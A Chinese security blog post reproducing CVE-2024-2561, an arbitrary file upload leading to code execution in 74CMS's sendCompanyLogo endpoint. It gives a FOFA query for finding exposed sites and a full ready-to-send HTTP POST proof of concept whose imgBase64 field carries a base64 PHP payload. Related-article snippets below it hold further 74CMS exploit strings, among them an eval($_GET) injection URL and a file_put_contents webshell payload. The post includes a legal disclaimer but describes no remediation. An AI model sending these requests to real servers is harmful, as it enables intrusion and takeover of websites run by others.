74CMS存在任意文件上传(CVE-2024-2561)

原创 于 2025-05-28 00:03:14 发布 · 616 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #漏洞复现 #网络安全 #漏洞利用

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

问题描述

74CMS存在任意文件上传(CVE-2024-2561),问题地址存在与sendCompanyLogo文件中/controller/company/Index.php#sendCompanyLogo的组件Company Logo Handler。经修改后的参数:imgBase64恶意代码输入可导致rce。

fofa

app="骑士-74CMS"

poc

POST /v1_0/company/index/sendCompanyLogo HTTP/1.1
Host: localhost:7888
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
user-token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: qscms_visitor=%7B%22utype%22%3A1%2C%22mobile%22%3A%2215212345678%22%2C%22token%22%3A%22eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MDk4MTY4MDcsImV4cCI6MTc0MTAyODgwNywiaW5mbyI6eyJ1aWQiOjEsInV0eXBlIjoxLCJtb2JpbGUiOiIxNTIxMjM0NTY3OCJ9fQ.8MYJ6e8qOGCR6s3pTIlFLsWFgAhC4f-F8XH_VNaC5BQ%22%7D
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

imgBase64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==

问题来源

74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 2389
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
CVE-2024-56145】PHP 漏洞导致 Craft CMS 出现 RCE
weixin_47075747的博客
12-22 709
大多数开发人员都同意,与 15 年前相比,PHP 是一种更加理智、更加安全和可靠的语言。PHP5早期的已让位于更好的开发生态系统,其中包括类、自动加载、更严格的类型、更理智的语法以及一大堆其他改进。安全性也没有被忽视。一些老读者可能还记得和的黑暗岁月,幸运的是,这些日子已经过去了。在现代,许多剩余的安全漏洞也已得到修复或缓解;你再也无法通过简单的 获得 RCE,我们不再有,并且诸如和 之'abc' == 0类的危险结构已从语言中删除。
74cms 5.0.1版本文件包含漏洞复现
ANYOUZHEN的博客
06-04 859
漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。下载地址: 下载后解压到phpstudy的根目录www里面输入网址,http://127.0.0.1/upload/install.php一直点击下一步,输入数据库名称和密码进入系统抓个包看看将包中的domain后面的改成 base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode 然后我们点击send进行发包,看到返回后stat
74cms代码执行漏洞
抚琴
01-03 2239
74cms-v4.2.1-v4.2.129-后台文件写入导致的代码执行漏洞 http://192.168.107.131:1026/upload/index.php?m=admin&c=index&a=index http://192.168.107.131:1026/upload/index.php?m=admin&c=tpl&a=set&tpl_dir=%27,%27a%27,eval($_GET[1]),%27 http://192.168.107.13
74cms v4.2.126-任意文件读取漏洞
weixin_50887021的博客
09-19 724
poc POST /74cms_home_setup_v4.2.111/74cms_v4.2.111/upload/index.php?m=Home&c=Members&a=register HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+
74cms 6.0.20版本文件包含漏洞复现
crowsec
06-08 2626
01 漏洞描述 参考资料: https://xz.aliyun.com/t/8021 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 下载地址: http://www.74cms.com/download/index.html 注意: 骑士cms不支持php7.x,复现php环境为php5.x即可 版本低于6.0.48 本文复现版本: 74c...
海洋CMS最新代码执行漏洞(CNVD-2024-44823、CVE-2024-42599)
护卫神的博客
12-06 788
SeaCMS 13.0版本存在代码执行漏洞,该漏洞源于对编辑文件的安全限制不到位,黑客可利用漏洞绕过其安全规则写入代码,从而执行任意命令(如上传木马),获取网站管理权限,以及进一步获取服务器权限。
帝国cms empirecms 文件上传CVE-2018-18086)复现
YouthBelief的博客
11-18 4404
所有文章,仅供安全研究与学习之用,后果自负! 这里写目录标题empirecms 文件上传CVE-2018-18086)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 empirecms 文件上传CVE-2018-18086) 0x01 漏洞描述 EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用漏洞上传任意文件。 密码:a
CVE-2024-9047 WordPress File Upload路径遍历漏洞分析
最新发布
qq_42735101的博客
01-20 1279
本文主要是对CVE-2024-9047WordPressFileUpload路径遍历漏洞进行分析,包括漏洞分析、代码详细说明、漏洞利用实践。CVE-2024-9047是一个存在于WordPress插件FileUpload<=4.24.11版本中的路径遍历漏洞。该插件目前已经更新到4.25.1版本,适合WordPress2.9.2及更高版本。文章提供概念验证代码,并建议读者遵循合法途径学习和使用相关知识。
Pluck-CMS任意文件上传漏洞CVE-2023-50564)
qq_23003811的博客
07-23 1024
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。4、构造payload,制作phpinfo.php,并压缩为phpinfo.zip。6、上传成功,自动跳转到phpinfo页面,拉到最下面可以看到上传后的文件路径。2、登录后台,找到managemodules,点击installmodule。3、漏洞点installmodule,一个文件上传功能。5、上传phpinfo.zip。
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74cms v6.0.48模版注入+文件包含getshell复现
qq_41814777的博客
03-14 5953
漏洞描述 74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码 影响版本 骑士 CMS < 6.0.48 风险等级 高 漏洞环境搭建 74 cms: 74cms_Home_Setup_v6.0.20.zip 系统:ubuntu18.04.5 php环境:php 5.6 系统镜像:http://old-releases.ubuntu.com/releases/ web源码下载:https://www.74cms.com/download/index.html 准备好后直接把源码放到var/
74CMS人才系统 CVE-2024-2561 RCE复现
mashiro_hibiki的博客
03-21 1417
将poc贴入修改登录的Cookie信息和Token。app="骑士-74CMS"需要先会员注册,注册为招聘者。
74cms漏洞寻找
wanderdjjs的博客
03-04 1110
这也就意味着该靶场存在xss漏洞,显示结果说明是过滤了 测试是否能显示网站cookie值。2.打开浏览器,在界面输入:IP/74cms/upload/install。1.安装完小皮之后,打开根目录,将74cms文件拖进根目录。注册结束之后进入靶场内部,我们可以选择前端和后端。这里我们选择后端,输入之前的用户名密码 进入。# 仅仅是娱乐所写,文章不够严谨,请勿见怪。1.在个人区域界面,点击搜索区域。会显示本机的IP地址和token值。3.正常我们输入是没有反馈的。这也就意味着存在文件包含漏洞
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 456
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74cms漏洞分析
aihuochou9723的博客
08-14 5289
很早以前的一个洞,看到很有意思就拿来看看 这是雨曾经审过的一个洞,因为读取方式很特别复现了一下 upload\plus\weixin.php public function responseMsg() { if(!$this->checkSignature()) { exit(); } $postStr =...
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 1150
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
74CMS 3.4 反射型XSS漏洞
浅笑996的博客
12-26 1830
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.4源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧templates\default目...
wordpress任意文件上传(cve-2019-15866)
09-04
WordPress是一种广泛使用的内容管理系统(CMS),用于创建和管理网站。然而,在2019年的漏洞披露中发现了一个名为CVE-2019-15866的重要漏洞,该漏洞使得攻击者可以进行任意文件上传。 该漏洞利用方式是通过特制的恶意请求,将恶意文件上传到WordPress网站的服务器上。攻击者可以上传包含恶意代码的文件,例如Web外壳或后门程序,以获取对网站的完全控制权。一旦攻击者获得对网站的控制,他们可以执行后续的恶意活动,例如操纵网站内容、传播恶意软件或窃取敏感信息。 为了防止CVE-2019-15866漏洞利用,用户应该尽快升级他们的WordPress网站到最新版本。WordPress开发团队通常会在发现漏洞时发布安全更新,其中包括修复漏洞和加强系统安全性的补丁。使用最新版本的WordPress是最有效的预防措施之一。 此外,用户还可以采取其他安全措施来保护他们的WordPress网站。以下是一些建议: 1. 安装并更新信任的安全插件: 安装安全插件,如Wordfence或iThemes Security,并确保将其保持最新。这些插件可以帮助检测和预防恶意文件上传安全问题。 2. 设定强密码和安全验证: 使用强密码,包括字母、数字和特殊字符的组合,并启用二次验证功能(如果提供)以增加访问控制。 3. 限制文件上传:限制上传文件的类型和大小,仅允许所需的文件类型,并限制文件大小以防止攻击者上传恶意文件。 4. 定期备份网站文件和数据库:定期备份网站文件和数据库,以防止数据丢失,并确保在发生安全事件时能够进行恢复。 总结而言,CVE-2019-15866漏洞是一个严重的安全威胁,可以使攻击者上传任意文件到WordPress网站。用户应及时升级他们的WordPress版本,并采取额外的安全措施以保护他们的网站免受此漏洞的影响。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值